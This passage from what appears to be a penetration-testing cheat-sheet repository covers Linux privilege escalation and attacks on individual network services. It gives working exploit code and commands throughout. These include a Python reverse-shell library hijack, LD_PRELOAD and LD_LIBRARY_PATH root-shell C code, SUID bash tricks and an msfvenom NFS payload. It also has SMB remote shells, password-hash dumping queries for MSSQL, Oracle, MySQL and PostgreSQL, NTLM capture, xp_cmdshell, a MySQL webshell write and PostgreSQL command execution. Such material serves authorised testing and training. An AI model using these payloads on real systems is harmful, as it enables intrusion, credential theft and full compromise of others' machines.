for the in /tmp first 372 | ``` 373 | - Or run program and pass `$PATH` to it _(this may also work for `sudo` commands with no secure_path set)_: 374 | ```bash 375 | PATH=/tmp:$PATH 376 | ``` 377 | 378 | ## Exploiting capabilities 379 | - Possibly dangerous capabilities: 380 | ``` 381 | =ep, CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_DAC_READ_SEARCH, CAP_SETUID, CAP_SETGID, CAP_NET_RAW, CAP_SYS_ADMIN, 382 | CAP_SYS_PTRACE, CAP_SYS_MODULE, CAP_FORMER, CAP_SETFCAP 383 | ``` 384 | - Example exploiting `CAP_SETUID` set for python3: 385 | ```bash 386 | /usr/bin/python3 -c 'import os; os.setuid(0); os.system("/bin/bash")' 387 | ``` 388 | 389 | ## Python library hijacking 390 | - Check library loading locations order: 391 | ```bash 392 | python -c 'import sys; print "\n".join(sys.path)' # The first empty one is the current dir 393 | ``` 394 | - Create required library copy keeping the same class/method signature and populate with the reverse shell code: 395 | ```python 396 | import os 397 | import pty 398 | import socket 399 | 400 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 401 | s.connect(("",443)) 402 | os.dup2(s.fileno(),0) 403 | os.dup2(s.fileno(),1) 404 | os.dup2(s.fileno(),2) 405 | pty.spawn("/bin/bash") 406 | s.close() 407 | ``` 408 | - Put code in the proper location if possible. 409 | - Or modify PYTHONPATH env variable if sudo SETENV is set: 410 | ```bash 411 | sudo PYTHONPATH=/tmp/ /usr/bin/ 412 | ``` 413 | 414 | ## `LD_PRELOAD` exploit 415 | - If `env_keep+=LD_PRELOAD` is set, use this exploit. 
416 | - `ld_preload_exploit.c`: 417 | ```C 418 | #include 419 | #include 420 | #include 421 | 422 | void _init() { 423 | unsetenv("LD_PRELOAD"); 424 | setresuid(0,0,0); 425 | system("/bin/bash -p"); 426 | } 427 | ``` 428 | - Compile it: 429 | ```bash 430 | gcc -shared -fPIC -nostartfiles -o /tmp/ld_preload.so ld_preload_exploit.c 431 | ``` 432 | - Run sudo program with `LD_PRELOAD`: 433 | ```bash 434 | sudo LD_PRELOAD=/tmp/ld_preload.so 435 | ``` 436 | 437 | ## `LD_LIBRARY_PATH` exploit 438 | - If `env_keep+=LD_LIBRARY_PATH` is set use this exploit. 439 | - Pick the shared library to replace: 440 | ```bash 441 | ldd 442 | ``` 443 | - `ld_library_path_exploit.c`: 444 | ```C 445 | #include 446 | #include 447 | 448 | static void hijack() __attribute__((constructor)) 449 | 450 | void hijack() { 451 | unsetenv("LD_LIBRARY_PATH"); 452 | setresuid(0,0,0); 453 | system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash"); // Or /bin/bash -p 454 | } 455 | ``` 456 | - Or create the file in one line: 457 | ```bash 458 | echo -e "#include \n#include \nstatic void hijack() __attribute__((constructor))\nvoid hijack() {\nunsetenv("LD_LIBRARY_PATH");\nsetresuid(0,0,0);\nsystem(\"cp /bin/bash /tmp/bash && chmod +s /tmp/bash\");}" > ld_library_path_exploit.c 459 | ``` 460 | - Compile it: 461 | ```bash 462 | gcc -shared -fPIC -o ./ ld_library_path_exploit.c 463 | ``` 464 | - Run sudo program with `LD_LIBRARY_PATH`: 465 | ```bash 466 | sudo LD_LIBRARY_PATH=. 467 | ``` 468 | 469 | ## Compiling a shared library running bash shell 470 | - Use `strace` to search for not found shared libraries in the application running by root. 
471 | - `bash_shared.c`: 472 | ```C 473 | #include <stdlib.h> 474 | #include <unistd.h> 475 | 476 | static void inject() __attribute__((constructor)); 477 | void inject() { 478 | setuid(0); 479 | system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash"); // Or /bin/bash -p 480 | } 481 | ``` 482 | - Or create the file in one line: 483 | ```bash 484 | echo -e "#include <stdlib.h>\n#include <unistd.h>\nstatic void inject() __attribute__((constructor));\nvoid inject() {\nsetuid(0);\nsystem(\"cp /bin/bash /tmp/bash && chmod +s /tmp/bash\");}" > bash_shared.c 485 | ``` 486 | - Compile it to the .so shared library file: 487 | ```bash 488 | gcc -shared -fPIC -o .so bash_shared.c 489 | ``` 490 | 491 | ## Compiling a service running bash shell 492 | - `bash_service.c` _(prepend `#include <stdlib.h>` and `#include <unistd.h>`; current GCC versions reject the implicit declarations of `setuid()`/`system()`)_: 493 | ```C 494 | int main() { 495 | setuid(0); 496 | system("cp /bin/bash /tmp/bash && chmod +s /tmp/bash"); // Or /bin/bash -p 497 | } 498 | ``` 499 | - Or create the file in one line: 500 | ```bash 501 | echo -e "#include <stdlib.h>\n#include <unistd.h>\nint main() {\nsetuid(0);\nsystem(\"cp /bin/bash /tmp/bash && chmod +s /tmp/bash\");}" > bash_service.c 502 | ``` 503 | - Compile it to the service file: 504 | ```bash 505 | gcc -o bash_service.c 506 | ``` 507 | 508 | ## Permissions modification in NFS 509 | - Mount the NFS share _(this only works if the export has `no_root_squash`; with the default `root_squash`, files you write as root are owned by `nobody` and the SUID bit is useless)_: 510 | ```bash 511 | mkdir /tmp/mounted_share 512 | sudo mount -t nfs : /tmp/mounted_share/ -o nolock 513 | ``` 514 | - Prepare the shell _(use `linux/x64/exec` for a 64-bit target)_: 515 | ```bash 516 | sudo msfvenom -p linux/x86/exec CMD="/bin/bash -p" -f elf -o /tmp/mounted_share/shell.elf 517 | ``` 518 | - Add permissions _(verify with `ls -l` that the file is owned by root on the share)_: 519 | ```bash 520 | sudo chmod +xs /tmp/mounted_share/shell.elf 521 | ``` 522 | - Run bash from the low privileged user on the target machine _(fails if the share is mounted there with `nosuid`)_: 523 | ```bash 524 | ./shell.elf 525 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/sqlite/README.md: -------------------------------------------------------------------------------- 1 | # SQLite enumeration and exploitation 2 | * [Reading a database file](#reading-a-database-file) 3 | *
[Enumerating a database](#enumerating-a-database) 4 | 5 | ## Reading a database file 6 | - Reading a database file with the `sqlite3` client: 7 | ```bash 8 | sqlite3 .sqlite # sqlite3 should be installed in /opt/homebrew on Apple Silicon 9 | ``` 10 | 11 | ## Enumerating a database 12 | - List tables: 13 | ```sqlite 14 | .tables 15 | ``` 16 | - Dump values: 17 | ```sqlite 18 | select * from ; 19 | ``` 20 | - Exit: 21 | ```sqlite 22 | .exit 23 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/tcp-135-539-msrpc/README.md: -------------------------------------------------------------------------------- 1 | # Microsoft Remote Procedure Call _(MSRPC)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Dumping endpoints](#dumping-endpoints) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 135,593 -sT # 593 is the RPC over HTTP endpoint mapper; the 539 in the directory name appears to be a typo 8 | ``` 9 | 10 | ## Dumping endpoints 11 | ```bash 12 | rpcdump.py 13 | ``` 14 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-139-445-smb/README.md: -------------------------------------------------------------------------------- 1 | # Server Message Block _(SMB)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [SID enumeration](#sid-enumeration) 4 | * [Connecting to and enumerating an SMB share](#connecting-to-and-enumerating-an-smb-share) 5 | * [Uploading files](#uploading-files) 6 | * [Reverse shells](#reverse-shells) 7 | 8 | ## Initial enumeration 9 | - Nmap smb-enum scripts _(not comprehensive, consider using other options)_: 10 | ```bash 11 | nmap -vv -p 139,445 -sT --script=+smb-enum* 12 | ``` 13 | - Nmap All SMB scripts _(usually takes too long)_: 14 | ```bash 15 | nmap -vv -p 139,445 -sT --script=+smb* 16 | ``` 17 | - `enum4linux` all enumeration: 18 | ```bash 19 | enum4linux -a 20 | ``` 21 | - List shares: 22 | ```bash 23 | smbclient -L 24 | smbclient -L -U 25 | ``` 26 | - List shares
with permissions: 27 | ```bash 28 | smbmap -H 29 | smbmap -H -u 'anonymous' 30 | smbmap -H -u 'anonymous' -p 'anonymous' 31 | smbmap -H -u -p '' 32 | ``` 33 | 34 | ## SID enumeration 35 | - Enumerate users using MSRPC _(requires access to the IPC$ share)_: 36 | ```bash 37 | lookupsid.py 38 | lookupsid.py :@ 39 | ``` 40 | 41 | ## Connecting to and enumerating an SMB share 42 | - Connect to a share: 43 | ```bash 44 | smbclient /// 45 | smbclient /// -U='anonymous%' 46 | smbclient /// -U='%' 47 | ``` 48 | - Enumerate files and folders: 49 | ```bash 50 | ls 51 | cd 52 | get 53 | ``` 54 | 55 | ## Uploading files 56 | ```bash 57 | put 58 | ``` 59 | 60 | ## Reverse shells 61 | ```bash 62 | psexec.py ':@' 63 | wmiexec.py ':@' 64 | winexe -U '%' // cmd.exe 65 | pth-winexe -U '%:' // cmd.exe 66 | ``` 67 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-1433-mssql/README.md: -------------------------------------------------------------------------------- 1 | # MSSQL enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to an MSSQL database](#connecting-to-an-mssql-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | * [Getting NTLM hashes](#getting-ntlm-hashes) 6 | * [Executing system commands](#executing-system-commands) 7 | 8 | ## Initial enumeration 9 | ```bash 10 | nmap -vv -p 1433 -sT --script=+ms-sql* 11 | ``` 12 | 13 | ## Connecting to an MSSQL database 14 | - Connect to a database using `mssql-cli`: 15 | ```bash 16 | mssql-cli -U -P '' -d -S "tcp:,1433" 17 | mssql-cli -U -P '' -d -S "tcp:,1433" -E # Windows auth 18 | ``` 19 | - Or connect using `mssqlclient.py`: 20 | ```bash 21 | mssqlclient.py -db :''@ 22 | mssqlclient.py -db -windows-auth :''@ # Windows auth 23 | mssqlclient.py -db -hashes LMHASH:NTHASH @ -windows-auth # Using hashes instead of a password 24 | ``` 25 | 26 | ## Enumerating a database 27 | - Get version: 28 | ```SQL 29 | SELECT @@version; 
30 | ``` 31 | - Get current database: 32 | ```SQL 33 | SELECT db_name(); 34 | ``` 35 | - List non-default databases: 36 | ```SQL 37 | SELECT name FROM master.sys.databases WHERE name NOT IN ('master', 'tempdb', 'model', 'msdb'); 38 | ``` 39 | - Get current user: 40 | ```SQL 41 | SELECT original_login(); 42 | ``` 43 | - List user permissions: 44 | ```SQL 45 | SELECT * FROM fn_my_permissions(NULL, 'SERVER'); 46 | ``` 47 | - Get current user's password hash _(encoded for 1731 hashcat mode; the `PasswordHash` property name is spelled with `char()` so the query contains no quotes)_: 48 | ```SQL 49 | SELECT convert(varchar(MAX),(loginproperty(original_login(),(char(080)+char(097)+char(115)+char(115)+char(119)+char(111)+char(114)+char(100)+char(072)+char(097)+char(115)+char(104))) ),1); 50 | ``` 51 | - List all users: 52 | ```SQL 53 | SELECT name FROM sys.syslogins ORDER BY 1; 54 | ``` 55 | - Get `sa` user's password hash _(encoded for 1731 hashcat mode)_: 56 | ```SQL 57 | SELECT convert(varchar(MAX),(loginproperty((char(115)+char(97)),(char(080)+char(097)+char(115)+char(115)+char(119)+char(111)+char(114)+char(100)+char(072)+char(097)+char(115)+char(104))) ),1); 58 | ``` 59 | - List tables: 60 | ```SQL 61 | SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1; 62 | ``` 63 | - List table columns: 64 | ```SQL 65 | SELECT column_name FROM information_schema.columns WHERE table_name='' ORDER BY 1; 66 | ``` 67 | - Search for `%user%` like tables: 68 | ```SQL 69 | SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE char(37)+char(117)+char(115)+char(101)+char(114)+char(37) ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY; -- LIMIT/OFFSET works on 2012+ version 70 | ``` 71 | 72 | ## Getting NTLM hashes 73 | - Listen for incoming SMB authentication on the attacker machine: 74 | ```bash 75 | sudo responder -I tun0 76 | ``` 77 | - Make the SQL Server service account authenticate to the attacker machine _(Responder captures its NetNTLMv2 hash; `xp_dirtree` is usually callable without sysadmin)_: 78 | ```SQL 79 | EXEC xp_dirtree '\\\test'; 80 | ``` 81 | 82 | ## Executing system commands 83 | - Configure _(if user has privileges to do it)_: 84 | ```SQL 85 |
EXEC sp_configure 'show advanced options', 1; 86 | RECONFIGURE; 87 | EXEC sp_configure 'xp_cmdshell', 1; 88 | RECONFIGURE; 89 | ``` 90 | - Run commands: 91 | ```SQL 92 | EXEC xp_cmdshell ''; 93 | ``` 94 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-1521-oracle_db/README.md: -------------------------------------------------------------------------------- 1 | # Oracle Database enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Brute-forcing a way in](#brute-forcing-a-way-in) 4 | * [Connecting to an Oracle database](#connecting-to-an-oracle-database) 5 | * [Enumerating a database](#enumerating-a-database) 6 | 7 | ## Initial enumeration 8 | ```bash 9 | nmap -vv -p 1521 -sT -A --script=+oracle* 10 | ``` 11 | 12 | ## Brute-forcing a way in 13 | - Guessing SIDs _(databases)_: 14 | ```bash 15 | odat sidguesser -s 16 | ``` 17 | - Brute-forcing both username and password _(using builtin list)_: 18 | ```bash 19 | odat passwordguesser -s -d --both-ul 20 | ``` 21 | - Brute-forcing password for the user: 22 | ```bash 23 | echo '' > username.txt 24 | odat passwordguesser -s -d --accounts-files $PWD/username.txt /Users/kali/rockyou.txt 25 | ``` 26 | 27 | ## Connecting to an Oracle database 28 | - Check available commands: 29 | ```bash 30 | odat all -s -d -U -P '' 31 | odat all -s -d -U -P '' --sysdba # Privileged 32 | ``` 33 | - Connect to a database: 34 | ```bash 35 | sqlplus '/@:/' 36 | sqlplus '/@:/' as sysdba # Privileged 37 | ``` 38 | - Improve formatting: 39 | ```SQL 40 | SET LINESIZE 32000; 41 | ``` 42 | 43 | ## Enumerating a database 44 | - Get version: 45 | ```SQL 46 | SELECT banner FROM v$version; 47 | SELECT version FROM v$instance; 48 | ``` 49 | - Get current database: 50 | ```SQL 51 | SELECT name from v$database; 52 | ``` 53 | - Get current user: 54 | ```SQL 55 | SELECT user FROM DUAL; 56 | ``` 57 | - Get current user permissions: 58 | ```SQL 59 | select * from 
user_role_privs; 60 | ``` 61 | - Get current user's password hash: 62 | ```SQL 63 | SELECT password FROM dba_users WHERE username=(SELECT user FROM DUAL); 64 | SELECT password FROM sys.user$ WHERE name=(SELECT user FROM DUAL); 65 | ``` 66 | - List all users: 67 | ```SQL 68 | SELECT username FROM dba_users ORDER BY 1; 69 | SELECT name FROM sys.user$ ORDER BY 1; 70 | ``` 71 | - Get default user's password hash: 72 | ```SQL 73 | SELECT password FROM dba_users WHERE lower(username)=(chr(115)||chr(121)||chr(115)); -- Get "sys" user's password hash 74 | SELECT password FROM dba_users WHERE lower(username)=(chr(115)||chr(121)||chr(115)||chr(116)||chr(101)||chr(109)); -- Get "system" user's password hash 75 | SELECT password FROM dba_users WHERE lower(username)=(chr(104)||chr(114)); -- Get "hr" user's password hash 76 | SELECT password FROM sys.user$ WHERE lower(name)=(chr(115)||chr(121)||chr(115)); -- Get "sys" user's password hash 77 | SELECT password FROM sys.user$ WHERE lower(name)=(chr(115)||chr(121)||chr(115)||chr(116)||chr(101)||chr(109)); -- Get "system" user's password hash 78 | SELECT password FROM sys.user$ WHERE lower(name)=(chr(104)||chr(114)); -- Get "hr" user's password hash 79 | ``` 80 | - List tables: 81 | ```SQL 82 | SELECT owner,table_name FROM all_tables ORDER BY 1; 83 | ``` 84 | - List table columns: 85 | ```SQL 86 | SELECT column_name FROM all_tab_columns WHERE table_name='' ORDER BY 1; 87 | ``` 88 | - Search for `%user%` like tables: 89 | ```SQL 90 | SELECT owner,table_name FROM all_tables WHERE lower(table_name) LIKE chr(37)||chr(117)||chr(115)||chr(101)||chr(114)||chr(37) ORDER BY 1 OFFSET 0 ROWS FETCH NEXT 1 ROWS ONLY; -- LIMIT/OFFSET works on 12.1+ version 91 | ``` 92 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-20-21-ftp/README.md: -------------------------------------------------------------------------------- 1 | # File Transfer Protocol _(FTP)_ enumeration and exploitation 2 | * 
[Initial enumeration](#initial-enumeration) 3 | * [Connecting to and enumerating an FTP server](#connecting-to-and-enumerating-an-ftp-server) 4 | * [Uploading files](#uploading-files) 5 | 6 | ## Initial enumeration 7 | ```bash 8 | nmap -vv -p 20,21 -sT --script=+ftp* 9 | ``` 10 | 11 | ## Connecting to and enumerating an FTP server 12 | - Connect to the FTP server: 13 | ```bash 14 | ftp # Try common creds: anonymous:, anonymous:anonymous, ftp:ftp 15 | ``` 16 | - Switch to passive mode _(the client opens the data connection, so it works when a firewall/NAT blocks inbound connections to you)_: 17 | ```bash 18 | passive 19 | ``` 20 | - Enumerate files and folders: 21 | ```bash 22 | ls -a # Always list hidden files as well 23 | cd 24 | 25 | binary # To download binary files 26 | ascii 27 | 28 | get 29 | ``` 30 | 31 | ## Uploading files 32 | ```bash 33 | binary # To upload binary files 34 | ascii 35 | 36 | put 37 | ``` 38 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-2049-nfs/README.md: -------------------------------------------------------------------------------- 1 | # Network File System _(NFS)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Share mounting](#share-mounting) 4 | 5 | ## Initial enumeration 6 | - Nmap NFS scripts: 7 | ```bash 8 | nmap -vv -p 2049 -sT --script=+nfs* 9 | ``` 10 | - List shares: 11 | ```bash 12 | showmount -e 13 | ``` 14 | 15 | ## Share mounting 16 | ```bash 17 | mkdir /tmp/mount 18 | sudo mount -t nfs : /tmp/mount/ -o nolock # `-o nolock`, not `-nolock` (mount parses the latter as `-n -o lock`) 19 | sudo umount /tmp/mount 20 | ``` 21 | 22 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-22-ssh/README.md: -------------------------------------------------------------------------------- 1 | # Secure Shell _(SSH)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Generating and using SSH keys](#generating-and-using-ssh-keys) 4 | * [Connecting to an SSH server](#connecting-to-an-ssh-server) 5 | 6 | ## Initial enumeration 7 | - Nmap
scanning: 8 | ```bash 9 | nmap -vv -p 22 -sT --script=+ssh* 10 | ``` 11 | 12 | ## Generating and using SSH keys 13 | - Generate an SSH key pair and print the public key: 14 | ```bash 15 | ssh-keygen -t rsa -C "kali@" 16 | # Enter the file path = ./id_rsa 17 | cat id_rsa.pub 18 | ``` 19 | - Add it to the `authorized_keys` file on the target machine _(append rather than overwrite so existing keys keep working; sshd ignores the file if `~/.ssh` or `authorized_keys` are group/world writable)_: 20 | ```bash 21 | mkdir -p ~/.ssh && echo '' >> ~/.ssh/authorized_keys && chmod 700 ~/.ssh && chmod 600 ~/.ssh/authorized_keys 22 | ``` 23 | 24 | ## Connecting to an SSH server 25 | ``` 26 | ssh -i @ # The private key file must be chmod 600, otherwise ssh refuses to use it 27 | ``` -------------------------------------------------------------------------------- /enum_and_exploit/tcp-23-telnet/README.md: -------------------------------------------------------------------------------- 1 | # Telnet enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a Telnet server](#connecting-to-a-telnet-server) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 23 -sT --script=+telnet* 8 | ``` 9 | 10 | ## Connecting to a Telnet server 11 | ```bash 12 | telnet 13 | ``` 14 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-25-465-587-smtp/README.md: -------------------------------------------------------------------------------- 1 | # Simple Mail Transfer Protocol _(SMTP)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Brute-forcing usernames](#brute-forcing-usernames) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 25,465,587 -sT --script=+smtp* 8 | ``` 9 | 10 | ## Brute-forcing usernames 11 | - Brute-force usernames: 12 | ```bash 13 | smtp-user-enum -U /Users/kali/SecLists/Usernames/top-usernames-shortlist.txt -t 14 | smtp-user-enum -M RCPT -U /Users/kali/SecLists/Usernames/top-usernames-shortlist.txt -t 15 | smtp-user-enum -M EXPN -U /Users/kali/SecLists/Usernames/top-usernames-shortlist.txt -t 16 | 17 | smtp-user-enum -U /Users/kali/SecLists/Usernames/xato-net-10-million-usernames.txt -t 18 | smtp-user-enum -M RCPT -U
/Users/kali/SecLists/Usernames/xato-net-10-million-usernames.txt -t 19 | smtp-user-enum -M EXPN -U /Users/kali/SecLists/Usernames/xato-net-10-million-usernames.txt -t 20 | ``` 21 | - Check if a single user exists: 22 | ```bash 23 | smtp-user-enum -u -t 24 | ``` 25 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-27017-mongodb/README.md: -------------------------------------------------------------------------------- 1 | # MongoDB enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a MongoDB database](#connecting-to-a-mongodb-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | 6 | ## Initial enumeration 7 | ```bash 8 | nmap -vv -p 27017,27018 -sT --script=+mongodb* 9 | ``` 10 | 11 | ## Connecting to a MongoDB database 12 | - Using mongo CLI: 13 | ```bash 14 | mongo "mongodb://@:27017/" -p '' 15 | ``` 16 | 17 | ## Enumerating a database 18 | - Get configuration: 19 | ```SQL 20 | db.adminCommand({getParameter:"*"}) 21 | ``` 22 | - Get current user and roles: 23 | ```SQL 24 | db.runCommand({connectionStatus : 1}) 25 | ``` 26 | - Get users: 27 | ```SQL 28 | db.getUsers() 29 | db.getUser("") 30 | ``` 31 | - Get password hashes: 32 | ```bash 33 | wget https://raw.githubusercontent.com/philsmd/mongodb2hashcat/main/mongodb2hashcat.js 34 | mongo "mongodb://@:27017/" -p '' --quiet mongodb2hashcat.js # Use 24100 and 24200 hashcat modes to crack them 35 | ``` 36 | - Show databases: 37 | ```SQL 38 | show dbs 39 | ``` 40 | - Show current dabase: 41 | ```SQL 42 | db 43 | ``` 44 | - Change database: 45 | ```SQL 46 | use 47 | ``` 48 | - Show collections: 49 | ```SQL 50 | show collections 51 | ``` 52 | - Show data: 53 | ```SQL 54 | db..find() 55 | db..find().pretty() 56 | ``` 57 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-3306-mysql/README.md: 
-------------------------------------------------------------------------------- 1 | # MySQL enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a MySQL database](#connecting-to-a-mysql-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | * [Saving anything to a file](#saving-anything-to-a-file) 6 | * [UDF PrivEsc](#udf-privesc) 7 | 8 | ## Initial enumeration 9 | ```bash 10 | nmap -vv -p 3306 -sT --script=+mysql* 11 | ``` 12 | 13 | ## Connecting to a MySQL database 14 | - Connect to a database using `mysql` client: 15 | ```bash 16 | mysql -u -p -h -P 3306 17 | ``` 18 | - Connect using `mysqlsh` _(X Protocol)_: 19 | ```bash 20 | mysqlsh --mysqlx -u -p -h -P 33060 -D 21 | ``` 22 | 23 | ## Enumerating a database 24 | - Get version: 25 | ```SQL 26 | SELECT @@version; 27 | ``` 28 | - Get current database: 29 | ```SQL 30 | SELECT database(); 31 | ``` 32 | - Get current user: 33 | ```SQL 34 | SELECT current_user(); 35 | ``` 36 | - Get current user's password hash: 37 | ```SQL 38 | SELECT password FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); -- Some databases still use password column 39 | SELECT authentication_string FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); 40 | SELECT concat(concat(char(036),char(109),char(121),char(115),char(113),char(108)),left(authentication_string,6),char(042),insert(hex(substring(authentication_string,8)),41,0,char(042))) FROM mysql.user WHERE user=left(current_user(),locate(char(064),current_user())-1) AND convert(host USING UTF8)=substring(current_user(),locate(char(064),current_user())+1,255); -- A current user's password hash encoded for the 7401 hashcat mode. Use this if a password hash has non-ASCII characters. 
41 | ``` 42 | - List all users: 43 | ```SQL 44 | SELECT user FROM mysql.user ORDER BY 1; 45 | ``` 46 | - Get default user's password hash: 47 | ```SQL 48 | SELECT password FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- "root" user. Some databases still use password column 49 | SELECT authentication_string FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- "root" user. 50 | SELECT concat(concat(char(036),char(109),char(121),char(115),char(113),char(108)),left(authentication_string,6),char(042),insert(hex(substring(authentication_string,8)),41,0,char(042))) FROM mysql.user WHERE lower(user)=concat(char(114),char(111),char(111),char(116)); -- A root user's password hash encoded for the 7401 hashcat mode. Use this if a password hash has non-ASCII characters. 51 | ``` 52 | - List tables: 53 | ```SQL 54 | SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1; 55 | ``` 56 | - List table columns: 57 | ```SQL 58 | SELECT column_name FROM information_schema.columns WHERE table_name='' ORDER BY 1; 59 | ``` 60 | - Search for `%user%` like tables: 61 | ```SQL 62 | SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE concat(char(37),char(117),char(115),char(101),char(114),char(37)) ORDER BY 1 LIMIT 1 OFFSET 0; 63 | ``` 64 | 65 | ## Saving anything to a file 66 | - Usually MySQL has permissions to write into the `/var/lib/mysql` folder _(requires the `FILE` privilege, and `secure_file_priv` must be empty or point to a usable directory — check with `SHOW VARIABLES LIKE 'secure_file_priv';`; pair the written file with an LFI or write under the web root to get execution)_: 67 | ```SQL 68 | select '' into outfile '/var/lib/mysql/cmd.php'; 69 | ``` 70 | 71 | ## UDF PrivEsc 72 | - Check if the MySQL daemon is running as root _(`ps -ef | grep mysql`)_; the SQL user also needs the `FILE` privilege and a writable `plugin_dir` _(`SHOW VARIABLES LIKE 'plugin_dir';`)_.
73 | - Compile this exploit: https://raw.githubusercontent.com/1N3/PrivEsc/master/mysql/raptor_udf2.c 74 | 75 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-3389-rdp/README.md: -------------------------------------------------------------------------------- 1 | # Remote Desktop Protocol _(RDP)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a machine](#connecting-to-a-machine) 4 | 5 | ## Initial enumeration 6 | ```bash 7 | nmap -vv -p 3389 -sT --script=+rdp* 8 | ``` 9 | 10 | ## Connecting to a machine 11 | ```bash 12 | xfreerdp +clipboard /w:1280 /h:720 /smart-sizing /cert:ignore /v: /u: /p:'' 13 | ``` 14 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-53-dns/README.md: -------------------------------------------------------------------------------- 1 | # Domain Name System _(DNS)_ enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Zone transfer](#zone-transfer) 4 | 5 | ## Initial enumeration 6 | - Nmap DNS scripts: 7 | ```bash 8 | nmap -vv -p 53 -sT --script=+dns* --script-args "dns-nsec-enum.domains='',dns-nsec3-enum.domains='',dns-brute.domain=''" 9 | ``` 10 | - Common enumeration with `dnsenum`: 11 | ```bash 12 | dnsenum --noreverse --enum --dnsserver 13 | ``` 14 | 15 | ## Zone transfer 16 | ```bash 17 | dig axfr @ 18 | ``` 19 | -------------------------------------------------------------------------------- /enum_and_exploit/tcp-5432-pgsql/README.md: -------------------------------------------------------------------------------- 1 | # PostgreSQL enumeration and exploitation 2 | * [Initial enumeration](#initial-enumeration) 3 | * [Connecting to a PostgreSQL database](#connecting-to-a-postgresql-database) 4 | * [Enumerating a database](#enumerating-a-database) 5 | * [Arbitrary File Read _(AFR)_](#arbitrary-file-read-afr) 6 | * [Remote Code Execution 
_(RCE)_](#remote-code-execution-rce) 7 | 8 | ## Initial enumeration 9 | ```bash 10 | nmap -vv -p 5432 -sT --script=+pgsql* 11 | ``` 12 | 13 | ## Connecting to a PostgreSQL database 14 | ```bash 15 | psql "dbname= host= user= password= port=5432" 16 | ``` 17 | 18 | ## Enumerating a database 19 | - Get version: 20 | ```SQL 21 | SELECT version(); 22 | ``` 23 | - Get current database: 24 | ```SQL 25 | SELECT current_database(); 26 | ``` 27 | - Get current user: 28 | ```SQL 29 | SELECT current_user; 30 | ``` 31 | - Get current user's password hash _(`pg_authid` is readable by superusers only)_: 32 | ```SQL 33 | SELECT rolpassword FROM pg_catalog.pg_authid WHERE rolname=current_user; 34 | ``` 35 | - List all users: 36 | ```SQL 37 | SELECT rolname FROM pg_catalog.pg_authid ORDER BY 1; 38 | ``` 39 | - Get default user's password hash: 40 | ```SQL 41 | SELECT rolpassword FROM pg_catalog.pg_authid WHERE rolname=(chr(112)||chr(111)||chr(115)||chr(116)||chr(103)||chr(114)||chr(101)||chr(115)); -- "postgres" user 42 | ``` 43 | - List tables: 44 | ```SQL 45 | SELECT table_schema,table_name FROM information_schema.tables ORDER BY 1; 46 | ``` 47 | - List table columns: 48 | ```SQL 49 | SELECT column_name FROM information_schema.columns WHERE table_name='' ORDER BY 1; 50 | ``` 51 | - Search for `%user%` like tables: 52 | ```SQL 53 | SELECT table_schema,table_name FROM information_schema.tables WHERE lower(table_name) LIKE chr(37)||chr(117)||chr(115)||chr(101)||chr(114)||chr(37) ORDER BY 1 LIMIT 1 OFFSET 0; 54 | ``` 55 | 56 | ## Arbitrary File Read _(AFR)_ 57 | - Directory listing _(`pg_ls_dir` and `COPY ... FROM` read as the server OS user and need superuser or, on PostgreSQL 11+, the `pg_read_server_files` role; check with `SELECT rolsuper FROM pg_roles WHERE rolname=current_user;`)_: 58 | ```SQL 59 | select pg_ls_dir(''); 60 | ``` 61 | - Read a file: 62 | ```SQL 63 | DROP TABLE IF EXISTS temp; 64 | CREATE TABLE temp(t TEXT); 65 | COPY temp FROM ''; 66 | SELECT * FROM temp; 67 | ``` 68 | 69 | ## Remote Code Execution _(RCE)_ 70 | `COPY ... FROM PROGRAM` runs the command as the server OS user _(usually `postgres`)_ and needs superuser or, on PostgreSQL 11+, the `pg_execute_server_program` role: 70 | ```SQL 71 | DROP TABLE IF 